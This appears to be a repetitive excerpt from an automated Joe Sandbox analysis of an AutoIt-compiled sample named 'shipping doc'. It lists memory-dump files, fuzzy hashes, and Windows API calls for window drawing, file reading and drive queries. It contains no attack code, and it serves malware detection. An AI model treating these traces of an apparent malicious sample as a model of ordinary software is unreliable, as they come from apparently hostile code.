                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6df1eacd66827601c25076c3336a32ab0fb1488a14c927e6ee80cd466274966d
                                                                                              • Instruction ID: 66020b2646c578ea20a491a915698e03d3d6c2cedc4d691b6abc0d644bdf133d
                                                                                              • Opcode Fuzzy Hash: 6df1eacd66827601c25076c3336a32ab0fb1488a14c927e6ee80cd466274966d
                                                                                              • Instruction Fuzzy Hash: 2D02B7B0E0011AEFDF14DF65D881AADB7F1FF54300F118169E916AB291EB71AE60CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                              • Instruction ID: 542f969beab191554173380bce0ea586092136a9674530042cdc5d7b10e5f2a7
                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                              • Instruction Fuzzy Hash: 599176732080A35ADB2E467E857807EFFE15A923A131A079DE4F2CA1C5FF68D954D720
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                              • Instruction ID: 17fc8394645a7f137e75826f97c5bf38b231a603d161131277cef08f9da1336a
                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                              • Instruction Fuzzy Hash: 459132722090E35ADB2D467A857403EFFF15A923A631A079EE4F2CB1C1FFA8D554D620
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: decabd672e093ea9c1fbd50d9b8f9b89fe760c1e5a23dabaa94cbcf21f442f84
                                                                                              • Instruction ID: 53fc894f59d5b66811fdd1e845d1ff96b6244a9c104a9a51e8da8ce423e20465
                                                                                              • Opcode Fuzzy Hash: decabd672e093ea9c1fbd50d9b8f9b89fe760c1e5a23dabaa94cbcf21f442f84
                                                                                              • Instruction Fuzzy Hash: BA613971F0C749A6EE38A9288995BBE3394DF55710F180919F8C2DB2C1DBD1BE42C365
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe6111e28591557eafd5454aec638ae99204d2f3f0dfcc51200506edf72d0a96
                                                                                              • Instruction ID: 085603712953fdbd0af5abed022fba58d12399c691ec92b17ac51628c1688625
                                                                                              • Opcode Fuzzy Hash: fe6111e28591557eafd5454aec638ae99204d2f3f0dfcc51200506edf72d0a96
                                                                                              • Instruction Fuzzy Hash: 61618971E0C70966DE395AA89891BBF2388EF52740F10095AF9C2DB2C1EBD2FD42C355
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                              • Instruction ID: d5de86f2d4f296f5cc867ac5db593486090a81a5796312e0a14bedc620348b48
                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                              • Instruction Fuzzy Hash: 878196336080A35EDB2D427A857443EFFE15A923A531A479ED4F2CB1C1FFA8C654E620
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e4b6a9f009772bf900f81a080d7866889bcb8304680426c062b1f7db16e4a36
                                                                                              • Instruction ID: 579be41d88a26bef8aa56aeb76095be574de100d2130552b53be951ffceae4a7
                                                                                              • Opcode Fuzzy Hash: 9e4b6a9f009772bf900f81a080d7866889bcb8304680426c062b1f7db16e4a36
                                                                                              • Instruction Fuzzy Hash: 2421BB326215118BD728CF79C85367E73E5A754310F15862EE4A7C77D0DF35A948C780
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00162B30
                                                                                              • DeleteObject.GDI32(00000000), ref: 00162B43
                                                                                              • DestroyWindow.USER32 ref: 00162B52
                                                                                              • GetDesktopWindow.USER32 ref: 00162B6D
                                                                                              • GetWindowRect.USER32(00000000), ref: 00162B74
                                                                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00162CA3
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00162CB1
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162CF8
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00162D04
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00162D40
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162D62
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162D75
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162D80
                                                                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162D89
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162D98
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162DA1
                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162DA8
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00162DB3
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162DC5
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0017FC38,00000000), ref: 00162DDB
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00162DEB
                                                                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00162E11
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00162E30
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00162E52
                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0016303F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 2211948467-2373415609
                                                                                              • Opcode ID: 5289d4e1f50d23b32ada16da801ac647e4bebe1741390d1de05a57262d95c8f2
                                                                                              • Instruction ID: 4b2f4eaf4a8c01af74a5ba3556b5fed4227382073d4c9dbe322976c3e524f102
                                                                                              • Opcode Fuzzy Hash: 5289d4e1f50d23b32ada16da801ac647e4bebe1741390d1de05a57262d95c8f2
                                                                                              • Instruction Fuzzy Hash: 44027C71900615EFDB14DF64CC89EAE7BB9FF48710F048158F919AB2A1DB74AD81CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0017712F
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00177160
                                                                                              • GetSysColor.USER32(0000000F), ref: 0017716C
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00177186
                                                                                              • SelectObject.GDI32(?,?), ref: 00177195
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 001771C0
                                                                                              • GetSysColor.USER32(00000010), ref: 001771C8
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 001771CF
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 001771DE
                                                                                              • DeleteObject.GDI32(00000000), ref: 001771E5
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00177230
                                                                                              • FillRect.USER32(?,?,?), ref: 00177262
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00177284
                                                                                                • Part of subcall function 001773E8: GetSysColor.USER32(00000012), ref: 00177421
                                                                                                • Part of subcall function 001773E8: SetTextColor.GDI32(?,?), ref: 00177425
                                                                                                • Part of subcall function 001773E8: GetSysColorBrush.USER32(0000000F), ref: 0017743B
                                                                                                • Part of subcall function 001773E8: GetSysColor.USER32(0000000F), ref: 00177446
                                                                                                • Part of subcall function 001773E8: GetSysColor.USER32(00000011), ref: 00177463
                                                                                                • Part of subcall function 001773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00177471
                                                                                                • Part of subcall function 001773E8: SelectObject.GDI32(?,00000000), ref: 00177482
                                                                                                • Part of subcall function 001773E8: SetBkColor.GDI32(?,00000000), ref: 0017748B
                                                                                                • Part of subcall function 001773E8: SelectObject.GDI32(?,?), ref: 00177498
                                                                                                • Part of subcall function 001773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001774B7
                                                                                                • Part of subcall function 001773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001774CE
                                                                                                • Part of subcall function 001773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001774DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                              • String ID:
                                                                                              • API String ID: 4124339563-0
                                                                                              • Opcode ID: e7b53af385ff919854c3569cbca44faca851cb62b8de49054af964b78f9907ff
                                                                                              • Instruction ID: d357e1ef1991c513e52a463d0280bdca0cdb630829e6eb6bf0059257478094b7
                                                                                              • Opcode Fuzzy Hash: e7b53af385ff919854c3569cbca44faca851cb62b8de49054af964b78f9907ff
                                                                                              • Instruction Fuzzy Hash: D8A1907210C301EFD7109F60DC48A6B7BB9FB89321F104A2DF96A965E1D771E984CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?), ref: 000F8E14
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00136AC5
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00136AFE
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00136F43
                                                                                                • Part of subcall function 000F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000F8BE8,?,00000000,?,?,?,?,000F8BBA,00000000,?), ref: 000F8FC5
                                                                                              • SendMessageW.USER32(?,00001053), ref: 00136F7F
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00136F96
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00136FAC
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00136FB7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 2760611726-4108050209
                                                                                              • Opcode ID: f9ebe2b12ac3b20a048eda2e13130de06a69d527161f94e6c85cda4714dfa296
                                                                                              • Instruction ID: cac89d79969f276fc7010d478917191ae25820b4a817b2eff08e1648e5334a34
                                                                                              • Opcode Fuzzy Hash: f9ebe2b12ac3b20a048eda2e13130de06a69d527161f94e6c85cda4714dfa296
                                                                                              • Instruction Fuzzy Hash: CD12A930200241EFDB25CF24D898BFABBF5FB45300F548569F5899BA61CB32AC91DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 0016273E
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0016286A
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001628A9
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001628B9
                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00162900
                                                                                              • GetClientRect.USER32(00000000,?), ref: 0016290C
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00162955
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00162964
                                                                                              • GetStockObject.GDI32(00000011), ref: 00162974
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00162978
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00162988
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00162991
                                                                                              • DeleteDC.GDI32(00000000), ref: 0016299A
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001629C6
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 001629DD
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00162A1D
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00162A31
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00162A42
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00162A77
                                                                                              • GetStockObject.GDI32(00000011), ref: 00162A82
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00162A8D
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00162A97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: cc8fa6caac3262daca40cab2e5646adb31fb5444a587ed4d20915f1d21159465
                                                                                              • Instruction ID: 22529d4d77eb89d2f31f01908fbc7ea75056e46697aec45c1eed5d9f2b3d4ce2
                                                                                              • Opcode Fuzzy Hash: cc8fa6caac3262daca40cab2e5646adb31fb5444a587ed4d20915f1d21159465
                                                                                              • Instruction Fuzzy Hash: F8B14C71A00615AFEB14DFA8DC85FAE7BB9FB08710F504118F915E76A1D774AD80CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00154AED
                                                                                              • GetDriveTypeW.KERNEL32(?,0017CB68,?,\\.\,0017CC08), ref: 00154BCA
                                                                                              • SetErrorMode.KERNEL32(00000000,0017CB68,?,\\.\,0017CC08), ref: 00154D36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086
                                                                                              • Opcode ID: 5b31948dfd2dd630ae694de00edd201b9b0bac30e5c228a255cb57fa904ca938
                                                                                              • Instruction ID: 23d7ebb551d1f1bfb21a217a97f1469b7869ffe126070c5cf14673e671b31e56
                                                                                              • Opcode Fuzzy Hash: 5b31948dfd2dd630ae694de00edd201b9b0bac30e5c228a255cb57fa904ca938
                                                                                              • Instruction Fuzzy Hash: 4D61E534605205EFCB08DF64CA819AC77B1AB8538AB298015FC26AF692DB31DDC9DB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000012), ref: 00177421
                                                                                              • SetTextColor.GDI32(?,?), ref: 00177425
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0017743B
                                                                                              • GetSysColor.USER32(0000000F), ref: 00177446
                                                                                              • CreateSolidBrush.GDI32(?), ref: 0017744B
                                                                                              • GetSysColor.USER32(00000011), ref: 00177463
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00177471
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00177482
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0017748B
                                                                                              • SelectObject.GDI32(?,?), ref: 00177498
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 001774B7
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001774CE
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 001774DB
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0017752A
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00177554
                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00177572
                                                                                              • DrawFocusRect.USER32(?,?), ref: 0017757D
                                                                                              • GetSysColor.USER32(00000011), ref: 0017758E
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00177596
                                                                                              • DrawTextW.USER32(?,001770F5,000000FF,?,00000000), ref: 001775A8
                                                                                              • SelectObject.GDI32(?,?), ref: 001775BF
                                                                                              • DeleteObject.GDI32(?), ref: 001775CA
                                                                                              • SelectObject.GDI32(?,?), ref: 001775D0
                                                                                              • DeleteObject.GDI32(?), ref: 001775D5
                                                                                              • SetTextColor.GDI32(?,?), ref: 001775DB
                                                                                              • SetBkColor.GDI32(?,?), ref: 001775E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
